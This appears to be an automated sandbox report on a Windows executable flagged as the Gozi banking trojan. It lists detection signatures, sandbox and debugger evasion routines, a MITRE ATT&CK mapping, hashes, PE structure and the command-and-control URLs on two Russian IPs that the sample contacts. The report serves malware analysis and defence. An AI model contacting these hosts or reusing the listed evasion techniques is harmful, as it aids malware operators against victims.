Source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401459 NtMapViewOfSection,
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02B61C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,
Source: server.exe | Virustotal: Detection: 49%
Source: server.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\server.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02D5C9F7 CreateToolhelp32Snapshot,Module32First,
Source: C:\Users\user\Desktop\server.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@1/2
Source: C:\Users\user\Desktop\server.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: C:\Users\user\Desktop\server.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: server.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: server.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: server.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: server.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: server.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: server.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: server.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\vecupeha_kocem\hanowida_tiyecu.pdb source: server.exe

      Data Obfuscation

Source: C:\Users\user\Desktop\server.exe | Unpacked PE file: 0.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\server.exe | Unpacked PE file: 0.2.server.exe.400000.0.unpack
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02D6B2D4 pushad ; iretd
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02D6408B push edi; ret
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02D5EDFF push 8B8751D0h; retf
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02D6B358 push esp; iretd
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02D6B138 push ss; iretd
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,

      Hooking and other Techniques for Hiding and Protection

Source: Yara match | File source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTR
Source: C:\Users\user\Desktop\server.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

Source: C:\Users\user\Desktop\server.exe | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\server.exe | API call chain: ExitProcess graph end node
Source: server.exe, 00000000.00000002.560887520.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWype.comL
Source: server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW

      Anti Debugging

Source: C:\Users\user\Desktop\server.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02B6092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02B60D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02D5C2D4 push dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\server.exe | Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
Source: C:\Users\user\Desktop\server.exe | Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,
Source: C:\Users\user\Desktop\server.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

      Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTR

      Remote Access Functionality

Source: Yara match | File source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTR
MITRE ATT&CK matrix (the number in parentheses after a technique is the count of signatures mapped to it; techniques without a number were not matched):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation (2) | Path Interception | Path Interception | Virtualization/Sandbox Evasion (1) | Input Capture (1) | System Time Discovery (1) | Remote Services | Input Capture (1) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API (11) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Obfuscated Files or Information (1) | LSASS Memory | Security Software Discovery (11) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol (2) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing (21) | Security Account Manager | Virtualization/Sandbox Evasion (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol (12) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | Process Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Remote System Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery (114) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
Source | Detection | Scanner | Label
server.exe | 49% | Virustotal |
server.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
0.2.server.exe.2cf0000.2.unpack | 100% | Avira | HEUR/AGEN.1245293
0.2.server.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
No Antivirus matches
Source | Detection | Scanner | Label
http://31.41.44.108/drew/kSoLH6P3P3ScRZ8VG2/ZyGmCU1Si/Pg3By2fxJOOkAR8rwi0H/T_2F0osErSjTF4ug24E/qpC0b | 0% | Avira URL Cloud | safe
http://5.44.43.17/H | 0% | Avira URL Cloud | safe
http://31.41.44.108/ows | 0% | Avira URL Cloud | safe
http://5.44.43.17/ | 0% | Avira URL Cloud | safe
http://5.44.43.17/ | 1% | Virustotal |
http://31.41.44.108/ | 0% | Avira URL Cloud | safe
http://31.41.44.108/ | 7% | Virustotal |
http://5.44.43.17/dows | 0% | Avira URL Cloud | safe
http://5.44.43.17/drew/L2Ctnat9/M34_2FbYe0ZC9ndvN_2FGmY/27aAwtqf0J/wCDEgzGms_2BItZWy/3Y988SJvsZ8d/G3 | 0% | Avira URL Cloud | safe
http://5.44.43.17/drew/L2Ctnat9/M34_2FbYe0ZC9ndvN_2FGmY/27aAwtqf0J/wCDEgzGms_2BItZWy/3Y988SJvsZ8d/G3blEZDMCSE/Bi4DBDrc6fsxs_/2B3aB3ncMi0pp47wsona_/2Bg3i_2FKiTRHGjN/oHTatVB82_2Bul8/TJX3dbVMmJ11Klc61D/Pyd9ldtz9/oHshYCyo8YOqEvONS9ad/fWHuvb04Djokj2GS9tP/hFDYxrH3WbHt3WZEGKZKd7/8Da2SdLCDRHMt/cExDArjC/xj0VJZ2pcmhn5qbmTarHUT8/nHF70Bsig92/tQ.jlk | 0% | Avira URL Cloud | safe
http://31.41. | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
checklist.skype.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://5.44.43.17/drew/L2Ctnat9/M34_2FbYe0ZC9ndvN_2FGmY/27aAwtqf0J/wCDEgzGms_2BItZWy/3Y988SJvsZ8d/G3blEZDMCSE/Bi4DBDrc6fsxs_/2B3aB3ncMi0pp47wsona_/2Bg3i_2FKiTRHGjN/oHTatVB82_2Bul8/TJX3dbVMmJ11Klc61D/Pyd9ldtz9/oHshYCyo8YOqEvONS9ad/fWHuvb04Djokj2GS9tP/hFDYxrH3WbHt3WZEGKZKd7/8Da2SdLCDRHMt/cExDArjC/xj0VJZ2pcmhn5qbmTarHUT8/nHF70Bsig92/tQ.jlk | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://31.41.44.108/ows | server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://31.41.44.108/drew/kSoLH6P3P3ScRZ8VG2/ZyGmCU1Si/Pg3By2fxJOOkAR8rwi0H/T_2F0osErSjTF4ug24E/qpC0b | server.exe, 00000000.00000002.560887520.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://5.44.43.17/ | server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
http://5.44.43.17/H | server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checklist.skype.com/drew/t0_2F8jI1aC786/3pDAJvqTmNvXKWVK8YEK3/dSLDX7_2Bak45Arz/NG3260JY92AIOa | server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://31.41.44.108/ | server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | false | 7%, Virustotal; Avira URL Cloud: safe | unknown
http://5.44.43.17/dows | server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://5.44.43.17/drew/L2Ctnat9/M34_2FbYe0ZC9ndvN_2FGmY/27aAwtqf0J/wCDEgzGms_2BItZWy/3Y988SJvsZ8d/G3 | server.exe, 00000000.00000002.560824916.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://31.41. | server.exe, 00000000.00000002.561015752.00000000048DC000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
IP | Domain | Country | ASN | ASN Name | Malicious
5.44.43.17 | unknown | Russian Federation | 202423 | MGNHOST-ASRU | true
31.41.44.108 | unknown | Russian Federation | 56577 | ASRELINKRU | false
          Joe Sandbox Version:37.0.0 Beryl
          Analysis ID:827617
          Start date and time:2023-03-16 07:21:06 +01:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 4m 48s
          Hypervisor based Inspection enabled:false
          Report type:light
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:7
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample file name:server.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@1/0@1/2
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 9.6% (good quality ratio 9.6%)
          • Quality average: 89%
          • Quality standard deviation: 15.4%
          HCA Information:
          • Successful, ratio: 86%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
• Not all processes were analyzed; the report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          No simulations
No context
          No created / dropped files found
          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):6.1349432521483696
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:server.exe
          File size:307200
          MD5:a4071382a33bb9fa55ff8bf8b111bc39
          SHA1:4eb7f936efe97a88aad9d38452829cd63a3624b2
          SHA256:04234564fe449d51f7e685455fcfafb3b7721a0b7d1551e3a370f579a3530e04
          SHA512:43a54adc868158e342419a4102e4a58a7556a2670f65991a4b71a23ccdc881edd30919a42dfcd2f8730d4e2117663936ea345dc467b43ebb7d48154fb792a19b
          SSDEEP:3072:HntJSBTLHSkg+3ukUWAKi1KPx5pZziCtyF4kWzbmgkONlfQKH:HtJQL1737AKwKJ5pZziB4kvIj
          TLSH:10642B0393E1BD85F92A8B729E1FCAF8765EF5508E09776922289F1F44B0277D263710
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A.c. .0. .0. .0.r.0. .0.r.0. .0.r.0. .0..j0. .0. .0. .0.r.0. .0.r.0. .0.r.0. .0Rich. .0................PE..L...@r.b...........
          Icon Hash:a4a4809484aca4e2
          Entrypoint:0x404d88
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:TERMINAL_SERVER_AWARE
          Time Stamp:0x62867240 [Thu May 19 16:37:20 2022 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:0
          File Version Major:5
          File Version Minor:0
          Subsystem Version Major:5
          Subsystem Version Minor:0
          Import Hash:0011bb4cb3dd2f1183b8c6c4581099ab
          Instruction
          call 00007F78A0CADE74h
          jmp 00007F78A0CABEBEh
          mov edi, edi
          push ecx
          mov dword ptr [ecx], 0040124Ch
          call 00007F78A0CADEF7h
          pop ecx
          ret
          mov edi, edi
          push ebp
          mov ebp, esp
          push esi
          mov esi, ecx
          call 00007F78A0CAC028h
          test byte ptr [ebp+08h], 00000001h
          je 00007F78A0CAC049h
          push esi
          call 00007F78A0CAC2F3h
          pop ecx
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          mov edi, edi
          push ebp
          mov ebp, esp
          mov ecx, dword ptr [ebp+08h]
          push ebx
          xor ebx, ebx
          push esi
          push edi
          cmp ecx, ebx
          je 00007F78A0CAC049h
          mov edi, dword ptr [ebp+0Ch]
          cmp edi, ebx
          jnbe 00007F78A0CAC05Dh
          call 00007F78A0CAE15Ch
          push 00000016h
          pop esi
          mov dword ptr [eax], esi
          push ebx
          push ebx
          push ebx
          push ebx
          push ebx
          call 00007F78A0CAE0E5h
          add esp, 14h
          mov eax, esi
          jmp 00007F78A0CAC072h
          mov esi, dword ptr [ebp+10h]
          cmp esi, ebx
          jne 00007F78A0CAC046h
          mov byte ptr [ecx], bl
          jmp 00007F78A0CAC01Ch
          mov edx, ecx
          mov al, byte ptr [esi]
          mov byte ptr [edx], al
          inc edx
          inc esi
          cmp al, bl
          je 00007F78A0CAC045h
          dec edi
          jne 00007F78A0CAC035h
          cmp edi, ebx
          jne 00007F78A0CAC052h
          mov byte ptr [ecx], bl
          call 00007F78A0CAE121h
          push 00000022h
          pop ecx
          mov dword ptr [eax], ecx
          mov esi, ecx
          jmp 00007F78A0CAC003h
          xor eax, eax
          pop edi
          pop esi
          pop ebx
          pop ebp
          ret
          push 0000000Ch
          push 0040EE10h
          call 00007F78A0CADBD6h
          and dword ptr [ebp-1Ch], 00000000h
          mov esi, dword ptr [ebp+08h]
          cmp esi, dword ptr [02AE85F0h]
          jnbe 00007F78A0CAC064h
          push 00000004h
          call 00007F78A0CAE27Eh
          pop ecx
          and dword ptr [ebp+00h], 00000000h
          Programming Language:
          • [C++] VS2008 build 21022
          • [ASM] VS2008 build 21022
          • [ C ] VS2008 build 21022
          • [IMP] VS2005 build 50727
          • [RES] VS2008 build 21022
          • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf0bc | 0x50 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x26e9000 | 0x1d550 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2707000 | 0xa34 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x11b0 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2d70 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x16c | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xe8f0 | 0xea00 | False | 0.5854867788461539 | data | 6.74566977698935 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x10000 | 0x26d8744 | 0x17200 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x26e9000 | 0x1d550 | 0x1d600 | False | 0.39934341755319147 | data | 4.477676246646998 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2707000 | 0x7878 | 0x7a00 | False | 0.07479508196721311 | data | 0.9257939540365804 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_CURSOR | 0x2702bf0 | 0x330 | Device independent bitmap graphic, 48 x 96 x 1, image size 0 | |
RT_CURSOR | 0x2702f20 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | |
RT_CURSOR | 0x2703078 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | |
RT_CURSOR | 0x2703f20 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | |
RT_CURSOR | 0x27047c8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | |
RT_CURSOR | 0x2704d60 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | |
RT_CURSOR | 0x2704e90 | 0xb0 | Device independent bitmap graphic, 16 x 32 x 1, image size 0 | |
RT_ICON | 0x26e9b10 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Serbian | Italy
RT_ICON | 0x26ea9b8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Serbian | Italy
RT_ICON | 0x26eb260 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Serbian | Italy
RT_ICON | 0x26eb928 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Serbian | Italy
RT_ICON | 0x26ebe90 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Serbian | Italy
RT_ICON | 0x26ee438 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Serbian | Italy
RT_ICON | 0x26ef4e0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Serbian | Italy
RT_ICON | 0x26ef9b0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Serbian | Italy
RT_ICON | 0x26f0858 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Serbian | Italy
RT_ICON | 0x26f1100 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Serbian | Italy
RT_ICON | 0x26f17c8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Serbian | Italy
RT_ICON | 0x26f1d30 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Serbian | Italy
RT_ICON | 0x26f42d8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Serbian | Italy
RT_ICON | 0x26f5380 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Serbian | Italy
RT_ICON | 0x26f5d08 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Serbian | Italy
RT_ICON | 0x26f61e8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Serbian | Italy
RT_ICON | 0x26f7090 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Serbian | Italy
RT_ICON | 0x26f7938 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Serbian | Italy
RT_ICON | 0x26f7ea0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Serbian | Italy
RT_ICON | 0x26fa448 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Serbian | Italy
RT_ICON | 0x26fb4f0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Serbian | Italy
RT_ICON | 0x26fbe78 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Serbian | Italy
RT_ICON | 0x26fc348 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Serbian | Italy
RT_ICON | 0x26fd1f0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Serbian | Italy
RT_ICON | 0x26fda98 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Serbian | Italy
RT_ICON | 0x26fe160 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Serbian | Italy
RT_ICON | 0x26fe6c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Serbian | Italy
RT_ICON | 0x2700c70 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Serbian | Italy
